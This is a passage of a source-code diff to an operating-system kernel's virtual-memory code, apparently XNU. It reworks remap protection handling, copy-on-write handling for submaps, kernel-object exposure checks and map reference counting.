VM_INHERIT_COPY; - } if (map != old_map) { entry->is_shared = TRUE; } @@ -13883,6 +13734,19 @@ protection_failure: } } + if (submap_needed_copy && (prot & VM_PROT_WRITE)) { + /* + * We went through a "needs_copy" submap without triggering + * a copy, so granting write access to the page would bypass + * that submap's "needs_copy". + */ + assert(!(fault_type & VM_PROT_WRITE)); + assert(!*wired); + assert(!force_copy); + // printf("FBDP %d[%s] submap_needed_copy for %p 0x%llx\n", proc_selfpid(), proc_name_address(current_task()->bsd_info), map, vaddr); + prot &= ~VM_PROT_WRITE; + } + /* * Create an object if necessary. */ @@ -14065,6 +13929,7 @@ vm_map_region_recurse_64( vm_region_submap_short_info_64_t short_info; boolean_t do_region_footprint; int effective_page_size, effective_page_shift; + boolean_t submap_needed_copy; if (map == VM_MAP_NULL) { /* no address space to work on */ @@ -14105,6 +13970,7 @@ vm_map_region_recurse_64( user_address = *address; user_max_depth = *nesting_depth; + submap_needed_copy = FALSE; if (not_in_kdp) { vm_map_lock_read(map); @@ -14241,6 +14107,11 @@ recurse_again: * Get down to the next submap level. */ + if (curr_entry->needs_copy) { + /* everything below this is effectively copy-on-write */ + submap_needed_copy = TRUE; + } + /* * Lock the next level and unlock the current level, * unless we need to keep it locked to access the "next_entry" @@ -14318,6 +14189,9 @@ recurse_again: submap_info->shadow_depth = 0; submap_info->external_pager = 0; submap_info->share_mode = SM_PRIVATE; + if (submap_needed_copy) { + submap_info->share_mode = SM_COW; + } submap_info->is_submap = 0; submap_info->behavior = VM_BEHAVIOR_DEFAULT; submap_info->object_id = VM_OBJECT_ID_FAKE(map, task_ledgers.purgeable_nonvolatile); @@ -14336,6 +14210,9 @@ recurse_again: short_info->external_pager = 0; short_info->shadow_depth = 0; short_info->share_mode = SM_PRIVATE; + if (submap_needed_copy) { + short_info->share_mode = SM_COW; + } short_info->ref_count = 1; } *nesting_depth = 0; @@ -14444,6 +14321,9 @@ recurse_again: extended.share_mode == SM_SHARED) { extended.share_mode = SM_PRIVATE; } + if (submap_needed_copy) { + extended.share_mode = SM_COW; + } } else { if (curr_entry->use_pmap) { extended.share_mode = SM_TRUESHARED; @@ -15160,8 +15040,6 @@ vm_map_simplify_entry( { vm_map_entry_t prev_entry; - counter(c_vm_map_simplify_entry_called++); - prev_entry = this_entry->vme_prev; if ((this_entry != vm_map_to_entry(map)) && @@ -15228,7 +15106,6 @@ vm_map_simplify_entry( } vm_map_entry_dispose(map, prev_entry); SAVE_HINT_MAP_WRITE(map, this_entry); - counter(c_vm_map_simplified++); } } @@ -15244,7 +15121,6 @@ vm_map_simplify( vm_map_simplify_entry(map, this_entry); vm_map_simplify_entry(map, this_entry->vme_next); } - counter(c_vm_map_simplify_called++); vm_map_unlock(map); } @@ -15807,8 +15683,6 @@ vm_map_entry_is_reusable( object->shadow == VM_OBJECT_NULL && object->internal && object->purgable == VM_PURGABLE_DENY && - object->copy_strategy != MEMORY_OBJECT_COPY_DELAY && - !object->true_share && object->wimg_bits == VM_WIMG_USE_DEFAULT && !object->code_signed) { return TRUE; @@ -16332,8 +16206,6 @@ vm_map_entry_insert( return new_entry; } -int vm_remap_old_path = 0; -int vm_remap_new_path = 0; /* * Routine: vm_map_remap_extract * @@ -16344,11 +16216,10 @@ vm_map_remap_extract( vm_map_t map, vm_map_offset_t addr, vm_map_size_t size, - vm_prot_t required_protection, boolean_t copy, struct vm_map_header *map_header, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* IN/OUT */ + vm_prot_t *max_protection, /* IN/OUT */ /* What, no behavior? */ vm_inherit_t inheritance, vm_map_kernel_flags_t vmk_flags) @@ -16371,6 +16242,8 @@ vm_map_remap_extract( vm_prot_t max_prot_for_prot_copy; vm_map_offset_t effective_page_mask; boolean_t pageable, same_map; + boolean_t vm_remap_legacy; + vm_prot_t required_cur_prot, required_max_prot; pageable = vmk_flags.vmkf_copy_pageable; same_map = vmk_flags.vmkf_copy_same_map; @@ -16383,7 +16256,9 @@ vm_map_remap_extract( assert(inheritance == VM_INHERIT_NONE || inheritance == VM_INHERIT_COPY || inheritance == VM_INHERIT_SHARE); - assert(!(required_protection & ~VM_PROT_ALL)); + assert(!(*cur_protection & ~VM_PROT_ALL)); + assert(!(*max_protection & ~VM_PROT_ALL)); + assert((*cur_protection & *max_protection) == *cur_protection); /* * Compute start and end of region. @@ -16405,12 +16280,52 @@ vm_map_remap_extract( vm_map_store_init( map_header ); if (copy && vmk_flags.vmkf_remap_prot_copy) { + /* + * Special case for vm_map_protect(VM_PROT_COPY): + * we want to set the new mappings' max protection to the + * specified *max_protection... + */ max_prot_for_prot_copy = *max_protection & VM_PROT_ALL; + /* ... but we want to use the vm_remap() legacy mode */ + *max_protection = VM_PROT_NONE; + *cur_protection = VM_PROT_NONE; } else { max_prot_for_prot_copy = VM_PROT_NONE; } - *cur_protection = VM_PROT_ALL; - *max_protection = VM_PROT_ALL; + + if (*cur_protection == VM_PROT_NONE && + *max_protection == VM_PROT_NONE) { + /* + * vm_remap() legacy mode: + * Extract all memory regions in the specified range and + * collect the strictest set of protections allowed on the + * entire range, so the caller knows what they can do with + * the remapped range. + * We start with VM_PROT_ALL and we'll remove the protections + * missing from each memory region. + */ + vm_remap_legacy = TRUE; + *cur_protection = VM_PROT_ALL; + *max_protection = VM_PROT_ALL; + required_cur_prot = VM_PROT_NONE; + required_max_prot = VM_PROT_NONE; + } else { + /* + * vm_remap_new() mode: + * Extract all memory regions in the specified range and + * ensure that they have at least the protections specified + * by the caller via *cur_protection and *max_protection. + * The resulting mapping should have these protections. + */ + vm_remap_legacy = FALSE; + if (copy) { + required_cur_prot = VM_PROT_NONE; + required_max_prot = VM_PROT_READ; + } else { + required_cur_prot = *cur_protection; + required_max_prot = *max_protection; + } + } map_address = 0; mapped_size = 0; @@ -16460,9 +16375,10 @@ vm_map_remap_extract( vm_map_t submap; vm_map_offset_t submap_start; vm_map_size_t submap_size; + boolean_t submap_needs_copy; /* - * No check for "required_protection" on "src_entry" + * No check for "required protection" on "src_entry" * because the protections that matter are the ones * on the submap's VM map entry, which will be checked * during the call to vm_map_remap_extract() below. @@ -16473,14 +16389,57 @@ vm_map_remap_extract( } submap_start = VME_OFFSET(src_entry) + src_start - src_entry->vme_start; submap = VME_SUBMAP(src_entry); + if (copy) { + /* + * The caller wants a copy-on-write re-mapping, + * so let's extract from the submap accordingly. + */ + submap_needs_copy = TRUE; + } else if (src_entry->needs_copy) { + /* + * The caller wants a shared re-mapping but the + * submap is mapped with "needs_copy", so its + * contents can't be shared as is. Extract the + * contents of the submap as "copy-on-write". + * The re-mapping won't be shared with the + * original mapping but this is equivalent to + * what happened with the original "remap from + * submap" code. + * The shared region is mapped "needs_copy", for + * example. + */ + submap_needs_copy = TRUE; + } else { + /* + * The caller wants a shared re-mapping and + * this mapping can be shared (no "needs_copy"), + * so let's extract from the submap accordingly. + * Kernel submaps are mapped without + * "needs_copy", for example. + */ + submap_needs_copy = FALSE; + } vm_map_reference(submap); vm_map_unlock(map); src_entry = NULL; + if (vm_remap_legacy) { + *cur_protection = VM_PROT_NONE; + *max_protection = VM_PROT_NONE; + } + + DTRACE_VM7(remap_submap_recurse, + vm_map_t, map, + vm_map_offset_t, addr, + vm_map_size_t, size, + boolean_t, copy, + vm_map_offset_t, submap_start, + vm_map_size_t, submap_size, + boolean_t, submap_needs_copy); + result = vm_map_remap_extract(submap, submap_start, submap_size, - required_protection, - copy, + submap_needs_copy, map_header, cur_protection, max_protection, @@ -16490,8 +16449,12 @@ vm_map_remap_extract( return result; } - if ((src_entry->protection & required_protection) - != required_protection) { + if (src_entry->is_sub_map) { + /* protections for submap mapping are irrelevant here */ + } else if (((src_entry->protection & required_cur_prot) != + required_cur_prot) || + ((src_entry->max_protection & required_max_prot) != + required_max_prot)) { if (vmk_flags.vmkf_copy_single_object && mapped_size != 0) { /* @@ -16514,18 +16477,16 @@ vm_map_remap_extract( break; } - if (src_entry->is_sub_map && - VM_MAP_PAGE_SHIFT(VME_SUBMAP(src_entry)) < PAGE_SHIFT) { + if (src_entry->is_sub_map) { vm_map_t submap; vm_map_offset_t submap_start; vm_map_size_t submap_size; vm_map_copy_t submap_copy; vm_prot_t submap_curprot, submap_maxprot; - - vm_remap_new_path++; + boolean_t submap_needs_copy; /* - * No check for "required_protection" on "src_entry" + * No check for "required protection" on "src_entry" * because the protections that matter are the ones * on the submap's VM map entry, which will be checked * during the call to vm_map_copy_extract() below. @@ -16537,16 +16498,47 @@ vm_map_remap_extract( submap = VME_SUBMAP(src_entry); submap_start = VME_OFFSET(src_entry) + src_start - src_entry->vme_start; submap_size = tmp_size; + if (copy) { + /* + * The caller wants a copy-on-write re-mapping, + * so let's extract from the submap accordingly. + */ + submap_needs_copy = TRUE; + } else if (src_entry->needs_copy) { + /* + * The caller wants a shared re-mapping but the + * submap is mapped with "needs_copy", so its + * contents can't be shared as is. Extract the + * contents of the submap as "copy-on-write". + * The re-mapping won't be shared with the + * original mapping but this is equivalent to + * what happened with the original "remap from + * submap" code. + * The shared region is mapped "needs_copy", for + * example. + */ + submap_needs_copy = TRUE; + } else { + /* + * The caller wants a shared re-mapping and + * this mapping can be shared (no "needs_copy"), + * so let's extract from the submap accordingly. + * Kernel submaps are mapped without + * "needs_copy", for example. + */ + submap_needs_copy = FALSE; + } /* extra ref to keep submap alive */ vm_map_reference(submap); - DTRACE_VM6(remap_submap_recurse, + DTRACE_VM7(remap_submap_recurse, vm_map_t, map, vm_map_offset_t, addr, vm_map_size_t, size, boolean_t, copy, vm_map_offset_t, submap_start, - vm_map_size_t, submap_size); + vm_map_size_t, submap_size, + boolean_t, submap_needs_copy); /* * The map can be safely unlocked since we @@ -16560,11 +16552,21 @@ vm_map_remap_extract( vm_map_unlock(map); src_entry = NULL; /* not valid once map is unlocked */ + if (vm_remap_legacy) { + submap_curprot = VM_PROT_NONE; + submap_maxprot = VM_PROT_NONE; + if (max_prot_for_prot_copy) { + submap_maxprot = max_prot_for_prot_copy; + } + } else { + assert(!max_prot_for_prot_copy); + submap_curprot = *cur_protection; + submap_maxprot = *max_protection; + } result = vm_map_copy_extract(submap, submap_start, submap_size, - required_protection, - copy, + submap_needs_copy, &submap_copy, &submap_curprot, &submap_maxprot, @@ -16588,6 +16590,26 @@ vm_map_remap_extract( copy_entry = vm_map_copy_first_entry(submap_copy); assert(!copy_entry->is_sub_map); + object = VME_OBJECT(copy_entry); + + /* + * Prevent kernel_object from being exposed to + * user space. + */ + if (__improbable(object == kernel_object)) { + printf("%d[%s]: rejecting attempt to extract from kernel_object\n", + proc_selfpid(), + (current_task()->bsd_info + ? proc_name_address(current_task()->bsd_info) + : "?")); + DTRACE_VM(extract_kernel_only); + result = KERN_INVALID_RIGHT; + vm_map_copy_discard(submap_copy); + submap_copy = VM_MAP_COPY_NULL; + vm_map_lock(map); + break; + } + vm_map_copy_entry_unlink(submap_copy, copy_entry); copy_entry_size = copy_entry->vme_end - copy_entry->vme_start; copy_entry->vme_start = map_address; @@ -16603,24 +16625,32 @@ vm_map_remap_extract( /* done with submap_copy */ vm_map_copy_discard(submap_copy); - *cur_protection &= submap_curprot; - *max_protection &= submap_maxprot; + if (vm_remap_legacy) { + *cur_protection &= submap_curprot; + *max_protection &= submap_maxprot; + } /* re-acquire the map lock and continue to next entry */ vm_map_lock(map); continue; - } else if (src_entry->is_sub_map) { - vm_remap_old_path++; - DTRACE_VM4(remap_submap, - vm_map_t, map, - vm_map_offset_t, addr, - vm_map_size_t, size, - boolean_t, copy); - - vm_map_reference(VME_SUBMAP(src_entry)); - object = VM_OBJECT_NULL; } else { object = VME_OBJECT(src_entry); + + /* + * Prevent kernel_object from being exposed to + * user space. + */ + if (__improbable(object == kernel_object)) { + printf("%d[%s]: rejecting attempt to extract from kernel_object\n", + proc_selfpid(), + (current_task()->bsd_info + ? proc_name_address(current_task()->bsd_info) + : "?")); + DTRACE_VM(extract_kernel_only); + result = KERN_INVALID_RIGHT; + break; + } + if (src_entry->iokit_acct) { /* * This entry uses "IOKit accounting". @@ -16663,6 +16693,7 @@ vm_map_remap_extract( VME_OFFSET_SET(src_entry, 0); VME_OBJECT_SET(src_entry, object); assert(src_entry->use_pmap); + assert(!map->mapped_in_other_pmaps); } else if (src_entry->wired_count || object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) { /* @@ -16756,6 +16787,7 @@ vm_map_remap_extract( */ object->copy_strategy = MEMORY_OBJECT_COPY_DELAY; + object->true_share = TRUE; } vm_object_unlock(object); } @@ -16801,6 +16833,10 @@ vm_map_remap_extract( new_entry->max_protection |= VM_PROT_WRITE; } else { new_entry->inheritance = inheritance; + if (!vm_remap_legacy) { + new_entry->protection = *cur_protection; + new_entry->max_protection = *max_protection; + } } VME_OFFSET_SET(new_entry, offset); @@ -16978,8 +17014,8 @@ RestartCopy: _vm_map_store_entry_link(map_header, map_header->links.prev, new_entry); - /*Protections for submap mapping are irrelevant here*/ - if (!src_entry->is_sub_map) { + /* protections for submap mapping are irrelevant here */ + if (vm_remap_legacy && !src_entry->is_sub_map) { *cur_protection &= src_entry->protection; *max_protection &= src_entry->max_protection; } @@ -17045,6 +17081,15 @@ vm_map_mark_alien( map->is_alien = true; vm_map_unlock(map); } + +void +vm_map_single_jit( + vm_map_t map) +{ + vm_map_lock(map); + map->single_jit = true; + vm_map_unlock(map); +} #endif /* XNU_TARGET_OS_OSX */ void vm_map_copy_to_physcopy(vm_map_copy_t copy_map, vm_map_t target_map); @@ -17622,8 +17667,9 @@ vm_map_range_physical_size( vmk_flags.vmkf_copy_pageable = TRUE; vmk_flags.vmkf_copy_same_map = TRUE; assert(adjusted_size != 0); + cur_prot = VM_PROT_NONE; /* legacy mode */ + max_prot = VM_PROT_NONE; /* legacy mode */ kr = vm_map_copy_extract(map, adjusted_start, adjusted_size, - VM_PROT_NONE, /* required_protection: no check here */ FALSE /* copy */, ©_map, &cur_prot, &max_prot, VM_INHERIT_DEFAULT, @@ -17679,7 +17725,7 @@ memory_entry_check_for_adjustment( vm_named_entry_t named_entry; - named_entry = (vm_named_entry_t) port->ip_kobject; + named_entry = (vm_named_entry_t) ipc_kobject_get(port); named_entry_lock(named_entry); copy_map = named_entry->backing.copy; target_copy_map = copy_map; @@ -17730,8 +17776,8 @@ vm_map_remap( vm_map_t src_map, vm_map_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* IN/OUT */ + vm_prot_t *max_protection, /* IN/OUT */ vm_inherit_t inheritance) { kern_return_t result; @@ -17841,10 +17887,9 @@ vm_map_remap( result = vm_map_copy_extract(src_map, memory_address, size, - VM_PROT_NONE, /* required_protection: no check here */ copy, ©_map, - cur_protection, - max_protection, + cur_protection, /* IN/OUT */ + max_protection, /* IN/OUT */ inheritance, vmk_flags); if (result != KERN_SUCCESS) { @@ -19641,7 +19686,7 @@ convert_port_entry_to_map( mach_destroy_memory_entry(port); return VM_MAP_NULL; } - vm_map_reference_swap(map); + vm_map_reference(map); mach_destroy_memory_entry(port); break; } else { @@ -19726,27 +19771,16 @@ current_map(void) /* * vm_map_reference: * - * Most code internal to the osfmk will go through a - * macro defining this. This is always here for the - * use of other kernel components. + * Takes a reference on the specified map. */ -#undef vm_map_reference void vm_map_reference( vm_map_t map) { - if (map == VM_MAP_NULL) { - return; + if (__probable(map != VM_MAP_NULL)) { + vm_map_require(map); + os_ref_retain(&map->map_refcnt); } - - lck_mtx_lock(&map->s_lock); -#if TASK_SWAPPER - assert(map->res_count > 0); - assert(os_ref_get_count(&map->map_refcnt) >= map->res_count); - map->res_count++; -#endif - os_ref_retain_locked(&map->map_refcnt); - lck_mtx_unlock(&map->s_lock); } /* @@ -19760,32 +19794,12 @@ void vm_map_deallocate( vm_map_t map) { - unsigned int ref; - - if (map == VM_MAP_NULL) { - return; - } - - lck_mtx_lock(&map->s_lock); - ref = os_ref_release_locked(&map->map_refcnt); - if (ref > 0) { - vm_map_res_deallocate(map); - lck_mtx_unlock(&map->s_lock); - return; + if (__probable(map != VM_MAP_NULL)) { + vm_map_require(map); + if (os_ref_release(&map->map_refcnt) == 0) { + vm_map_destroy(map, VM_MAP_REMOVE_NO_FLAGS); + } } - assert(os_ref_get_count(&map->map_refcnt) == 0); - lck_mtx_unlock(&map->s_lock); - -#if TASK_SWAPPER - /* - * The map residence count isn't decremented here because - * the vm_map_delete below will traverse the entire map, - * deleting entries, and the residence counts on objects - * and sharing maps will go away then. - */ -#endif - - vm_map_destroy(map, VM_MAP_REMOVE_NO_FLAGS); } void diff --git a/osfmk/vm/vm_map.h b/osfmk/vm/vm_map.h index cd1364f2b..dca074ab6 100644 --- a/osfmk/vm/vm_map.h +++ b/osfmk/vm/vm_map.h @@ -109,7 +109,6 @@ __END_DECLS #ifdef MACH_KERNEL_PRIVATE -#include #include #include @@ -467,9 +466,9 @@ struct _vm_map { vm_map_size_t size; /* virtual size */ vm_map_size_t user_wire_limit;/* rlimit on user locked memory */ vm_map_size_t user_wire_size; /* current size of user locked memory in this map */ -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX vm_map_offset_t vmmap_high_start; -#endif +#endif /* XNU_TARGET_OS_OSX */ union { /* @@ -504,31 +503,27 @@ struct _vm_map { #define first_free f_s._first_free #define holes_list f_s._holes - struct os_refcnt map_refcnt; /* Reference count */ - -#if TASK_SWAPPER - int res_count; /* Residence count (swap) */ - int sw_state; /* Swap state */ -#endif /* TASK_SWAPPER */ + struct os_refcnt map_refcnt; /* Reference count */ unsigned int /* boolean_t */ wait_for_space:1, /* Should callers wait for space? */ - /* boolean_t */ wiring_required:1, /* All memory wired? */ - /* boolean_t */ no_zero_fill:1, /*No zero fill absent pages */ - /* boolean_t */ mapped_in_other_pmaps:1, /*has this submap been mapped in maps that use a different pmap */ - /* boolean_t */ switch_protect:1, /* Protect map from write faults while switched */ - /* boolean_t */ disable_vmentry_reuse:1, /* All vm entries should keep using newer and higher addresses in the map */ - /* boolean_t */ map_disallow_data_exec:1, /* Disallow execution from data pages on exec-permissive architectures */ + /* boolean_t */ wiring_required:1, /* All memory wired? */ + /* boolean_t */ no_zero_fill:1, /* No zero fill absent pages */ + /* boolean_t */ mapped_in_other_pmaps:1, /* has this submap been mapped in maps that use a different pmap */ + /* boolean_t */ switch_protect:1, /* Protect map from write faults while switched */ + /* boolean_t */ disable_vmentry_reuse:1, /* All vm entries should keep using newer and higher addresses in the map */ + /* boolean_t */ map_disallow_data_exec:1, /* Disallow execution from data pages on exec-permissive architectures */ /* boolean_t */ holelistenabled:1, /* boolean_t */ is_nested_map:1, - /* boolean_t */ map_disallow_new_exec:1, /* Disallow new executable code */ + /* boolean_t */ map_disallow_new_exec:1, /* Disallow new executable code */ /* boolean_t */ jit_entry_exists:1, /* boolean_t */ has_corpse_footprint:1, /* boolean_t */ terminated:1, - /* boolean_t */ is_alien:1, /* for platform simulation, i.e. PLATFORM_IOS on OSX */ - /* boolean_t */ cs_enforcement:1, /* code-signing enforcement */ - /* boolean_t */ reserved_regions:1, /* has reserved regions. The map size that userspace sees should ignore these. */ - /* reserved */ pad:16; + /* boolean_t */ is_alien:1, /* for platform simulation, i.e. PLATFORM_IOS on OSX */ + /* boolean_t */ cs_enforcement:1, /* code-signing enforcement */ + /* boolean_t */ reserved_regions:1, /* has reserved regions. The map size that userspace sees should ignore these. */ + /* boolean_t */ single_jit:1, /* only allow one JIT mapping */ + /* reserved */ pad:15; unsigned int timestamp; /* Version number */ }; @@ -537,14 +532,6 @@ struct _vm_map { #define vm_map_first_entry(map) ((map)->hdr.links.next) #define vm_map_last_entry(map) ((map)->hdr.links.prev) -#if TASK_SWAPPER -/* - * VM map swap states. There are no transition states. - */ -#define MAP_SW_IN 1 /* map is swapped in; residence count > 0 */ -#define MAP_SW_OUT 2 /* map is out (res_count == 0 */ -#endif /* TASK_SWAPPER */ - /* * Type: vm_map_version_t [exported; contents invisible] * @@ -828,97 +815,9 @@ extern vm_map_entry_t vm_map_entry_insert( /* Physical map associated * with this address map */ -/* - * Macros/functions for map residence counts and swapin/out of vm maps - */ -#if TASK_SWAPPER - -#if MACH_ASSERT /* Gain a reference to an existing map */ extern void vm_map_reference( vm_map_t map); -/* Lose a residence count */ -extern void vm_map_res_deallocate( - vm_map_t map); -/* Gain a residence count on a map */ -extern void vm_map_res_reference( - vm_map_t map); -/* Gain reference & residence counts to possibly swapped-out map */ -extern void vm_map_reference_swap( - vm_map_t map); - -#else /* MACH_ASSERT */ - -#define vm_map_reference(map) \ -MACRO_BEGIN \ - vm_map_t Map = (map); \ - if (Map) { \ - lck_mtx_lock(&Map->s_lock); \ - Map->res_count++; \ - os_ref_retain(&Map->map_refcnt); \ - lck_mtx_unlock(&Map->s_lock); \ - } \ -MACRO_END - -#define vm_map_res_reference(map) \ -MACRO_BEGIN \ - vm_map_t Lmap = (map); \ - if (Lmap->res_count == 0) { \ - lck_mtx_unlock(&Lmap->s_lock);\ - vm_map_lock(Lmap); \ - vm_map_swapin(Lmap); \ - lck_mtx_lock(&Lmap->s_lock); \ - ++Lmap->res_count; \ - vm_map_unlock(Lmap); \ - } else \ - ++Lmap->res_count; \ -MACRO_END - -#define vm_map_res_deallocate(map) \ -MACRO_BEGIN \ - vm_map_t Map = (map); \ - if (--Map->res_count == 0) { \ - lck_mtx_unlock(&Map->s_lock); \ - vm_map_lock(Map); \ - vm_map_swapout(Map); \ - vm_map_unlock(Map); \ - lck_mtx_lock(&Map->s_lock); \ - } \ -MACRO_END - -#define vm_map_reference_swap(map) \ -MACRO_BEGIN \ - vm_map_t Map = (map); \ - lck_mtx_lock(&Map->s_lock); \ - os_ref_retain(&Map->map_refcnt);\ - vm_map_res_reference(Map); \ - lck_mtx_unlock(&Map->s_lock); \ -MACRO_END -#endif /* MACH_ASSERT */ - -extern void vm_map_swapin( - vm_map_t map); - -extern void vm_map_swapout( - vm_map_t map); - -#else /* TASK_SWAPPER */ - -#define vm_map_reference(map) \ -MACRO_BEGIN \ - vm_map_t Map = (map); \ - if (Map) { \ - lck_mtx_lock(&Map->s_lock); \ - os_ref_retain(&Map->map_refcnt);\ - lck_mtx_unlock(&Map->s_lock); \ - } \ -MACRO_END - -#define vm_map_reference_swap(map) vm_map_reference(map) -#define vm_map_res_reference(map) -#define vm_map_res_deallocate(map) - -#endif /* TASK_SWAPPER */ /* * Submap object. Must be used to create memory to be put @@ -939,28 +838,6 @@ extern vm_object_t vm_submap_object; thread_wakeup((event_t)(&(map)->hdr)) -#define vm_map_ref_fast(map) \ - MACRO_BEGIN \ - lck_mtx_lock(&map->s_lock); \ - map->ref_count++; \ - vm_map_res_reference(map); \ - lck_mtx_unlock(&map->s_lock); \ - MACRO_END - -#define vm_map_dealloc_fast(map) \ - MACRO_BEGIN \ - int c; \ - \ - lck_mtx_lock(&map->s_lock); \ - c = --map->ref_count; \ - if (c > 0) \ - vm_map_res_deallocate(map); \ - lck_mtx_unlock(&map->s_lock); \ - if (c == 0) \ - vm_map_destroy(map); \ - MACRO_END - - /* simplify map entries */ extern void vm_map_simplify_entry( vm_map_t map, @@ -1384,6 +1261,9 @@ extern kern_return_t vm_map_enter_mem_object_control( extern kern_return_t vm_map_terminate( vm_map_t map); +extern void vm_map_require( + vm_map_t map); + #endif /* !XNU_KERNEL_PRIVATE */ /* Deallocate a region */ @@ -1475,7 +1355,6 @@ extern kern_return_t vm_map_copy_extract( vm_map_t src_map, vm_map_address_t src_addr, vm_map_size_t len, - vm_prot_t required_prot, boolean_t copy, vm_map_copy_t *copy_result, /* OUT */ vm_prot_t *cur_prot, /* OUT */ @@ -1529,11 +1408,11 @@ extern kern_return_t vm_map_raise_max_offset( extern kern_return_t vm_map_raise_min_offset( vm_map_t map, vm_map_offset_t new_min_offset); -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX extern void vm_map_set_high_start( vm_map_t map, vm_map_offset_t high_start); -#endif +#endif /* XNU_TARGET_OS_OSX */ extern vm_map_offset_t vm_compute_max_offset( boolean_t is64); @@ -1607,6 +1486,7 @@ mach_vm_range_overflows(mach_vm_offset_t addr, mach_vm_size_t size) #if XNU_TARGET_OS_OSX extern void vm_map_mark_alien(vm_map_t map); +extern void vm_map_single_jit(vm_map_t map); #endif /* XNU_TARGET_OS_OSX */ extern kern_return_t vm_map_page_info( @@ -1716,7 +1596,7 @@ static inline bool VM_MAP_POLICY_ALLOW_MULTIPLE_JIT( vm_map_t map __unused) { - if (VM_MAP_IS_ALIEN(map)) { + if (VM_MAP_IS_ALIEN(map) || map->single_jit) { return false; } return true; diff --git a/osfmk/vm/vm_object.c b/osfmk/vm/vm_object.c index b7a718aea..178a19552 100644 --- a/osfmk/vm/vm_object.c +++ b/osfmk/vm/vm_object.c @@ -64,7 +64,6 @@ #include #include -#include #include #include @@ -244,10 +243,18 @@ SECURITY_READ_ONLY_LATE(zone_t) vm_object_zone; /* vm backing store zone */ * memory object (kernel_object) to avoid wasting data structures. */ static struct vm_object kernel_object_store VM_PAGE_PACKED_ALIGNED; -vm_object_t kernel_object; +SECURITY_READ_ONLY_LATE(vm_object_t) kernel_object = &kernel_object_store; static struct vm_object compressor_object_store VM_PAGE_PACKED_ALIGNED; -vm_object_t compressor_object = &compressor_object_store; +SECURITY_READ_ONLY_LATE(vm_object_t) compressor_object = &compressor_object_store; + +/* + * This object holds all pages that have been retired due to errors like ECC. + * The system should never use the page or look at its contents. The offset + * in this object is the same as the page's physical address. + */ +static struct vm_object retired_pages_object_store VM_PAGE_PACKED_ALIGNED; +SECURITY_READ_ONLY_LATE(vm_object_t) retired_pages_object = &retired_pages_object_store; /* * The submap object is used as a placeholder for vm_map_submap @@ -256,6 +263,8 @@ vm_object_t compressor_object = &compressor_object_s * here because it must be initialized here. */ static struct vm_object vm_submap_object_store VM_PAGE_PACKED_ALIGNED; +SECURITY_READ_ONLY_LATE(vm_object_t) vm_submap_object = &vm_submap_object_store; + /* * Virtual memory objects are initialized from @@ -279,9 +288,6 @@ static const struct vm_object vm_object_template = { .vo_size = 0, .memq_hint = VM_PAGE_NULL, .ref_count = 1, -#if TASK_SWAPPER - .res_count = 1, -#endif /* TASK_SWAPPER */ .resident_page_count = 0, .wired_page_count = 0, .reusable_page_count = 0, @@ -554,7 +560,7 @@ vm_object_bootstrap(void) ZC_NOENCRYPT | ZC_ALIGNMENT_REQUIRED, ZONE_ID_ANY, ^(zone_t z){ #if defined(__LP64__) - zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP); + zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED); #else (void)z; #endif @@ -568,30 +574,28 @@ vm_object_bootstrap(void) * Initialize the "kernel object" */ - kernel_object = &kernel_object_store; - -/* - * Note that in the following size specifications, we need to add 1 because - * VM_MAX_KERNEL_ADDRESS (vm_last_addr) is a maximum address, not a size. - */ - - _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, - kernel_object); - - _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, - compressor_object); + /* + * Note that in the following size specifications, we need to add 1 because + * VM_MAX_KERNEL_ADDRESS (vm_last_addr) is a maximum address, not a size. + */ + _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, kernel_object); + _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, compressor_object); kernel_object->copy_strategy = MEMORY_OBJECT_COPY_NONE; compressor_object->copy_strategy = MEMORY_OBJECT_COPY_NONE; kernel_object->no_tag_update = TRUE; + /* + * The object to hold retired VM pages. + */ + _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, retired_pages_object); + retired_pages_object->copy_strategy = MEMORY_OBJECT_COPY_NONE; + /* * Initialize the "submap object". Make it as large as the * kernel object so that no limit is imposed on submap sizes. */ - vm_submap_object = &vm_submap_object_store; - _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, - vm_submap_object); + _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, vm_submap_object); vm_submap_object->copy_strategy = MEMORY_OBJECT_COPY_NONE; /* @@ -666,7 +670,7 @@ vm_object_deallocate( return; } - if (object == kernel_object || object == compressor_object) { + if (object == kernel_object || object == compressor_object || object == retired_pages_object) { vm_object_lock_shared(object); OSAddAtomic(-1, &object->ref_count); @@ -674,6 +678,8 @@ vm_object_deallocate( if (object->ref_count == 0) { if (object == kernel_object) { panic("vm_object_deallocate: losing kernel_object\n"); + } else if (object == retired_pages_object) { + panic("vm_object_deallocate: losing retired_pages_object\n"); } else { panic("vm_object_deallocate: losing compressor_object\n"); } @@ -805,7 +811,6 @@ vm_object_deallocate( if ((object->ref_count > 1) || object->terminating) { vm_object_lock_assert_exclusive(object); object->ref_count--; - vm_object_res_deallocate(object); if (object->ref_count == 1 && object->shadow != VM_OBJECT_NULL) { @@ -847,7 +852,6 @@ vm_object_deallocate( continue; } - VM_OBJ_RES_DECR(object); /* XXX ? */ /* * Terminate this object. If it had a shadow, * then deallocate it; otherwise, if we need @@ -928,7 +932,7 @@ vm_object_page_grab( if ((p->vmp_q_state != VM_PAGE_ON_ACTIVE_Q) && p->vmp_reference == TRUE) { vm_page_activate(p); - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); vm_object_page_grab_reactivations++; } vm_page_unlock_queues(); @@ -1297,7 +1301,6 @@ vm_object_terminate( vm_object_lock_assert_exclusive(object); object->ref_count--; assert(object->ref_count > 0); - vm_object_res_deallocate(object); vm_object_unlock(object); return KERN_FAILURE; } @@ -1443,14 +1446,10 @@ vm_object_reap( object->pager = MEMORY_OBJECT_NULL; if (pager != MEMORY_OBJECT_NULL) { - memory_object_control_disable(object->pager_control); + 